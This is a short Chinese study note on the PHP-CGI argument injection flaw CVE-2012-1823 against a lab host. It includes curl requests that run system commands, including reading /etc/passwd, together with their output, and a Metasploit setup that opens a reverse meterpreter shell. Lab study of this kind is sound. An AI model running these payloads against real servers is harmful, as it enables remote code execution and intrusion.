CVE-2012-1823学习

参考：
https://pentesterlab.com/exercises/cve-2012-1823/course
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

user@debian:~$ php-cgi -hUsage: php [-q] [-h] [-s] [-v] [-i] [-f ]       php  [args...]  -a               Run interactively  -b | Bind Path for external FASTCGI Server mode  -C               Do not chdir to the script's directory  -c | Look for php.ini file in this directory  -n               No php.ini file will be used  -d foo[=bar]     Define INI entry foo with value 'bar'  -e               Generate extended information for debugger/profiler  -f         Parse .  Implies `-q'  -h               This help  -i               PHP information  -l               Syntax check only (lint)  -m               Show compiled in modules  -q               Quiet-mode.  Suppress HTTP Header output.  -s               Display colour syntax highlighted source.  -v               Version number  -w               Display source with stripped comments and whitespace.  -z         Load Zend extension .  -T        Measure execution time of script repeated  times.

于是我们试一下http://192.168.170.133/index.php?-s或者http://192.168.170.133/?-s即可查看到该文件index.php的源码。

将『

➜  ~  curl "http://192.168.170.133/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" --data "<?php system('uname -a');die(); ?>"Linux debian 2.6.32-5-amd64 #1 SMP Thu Mar 22 17:26:33 UTC 2012 x86_64 GNU/Linux➜  ~  curl "http://192.168.170.133/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" --data "<?php system('cat /etc/passwd');die(); ?>"root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/sh...

利用metasploit

# php-cgi.msfuse exploit/multi/http/php_cgi_arg_injectionset RHOST 192.168.170.133set RPORT 80set PAYLOAD php/meterpreter/reverse_tcpset LHOST 192.168.170.132exploit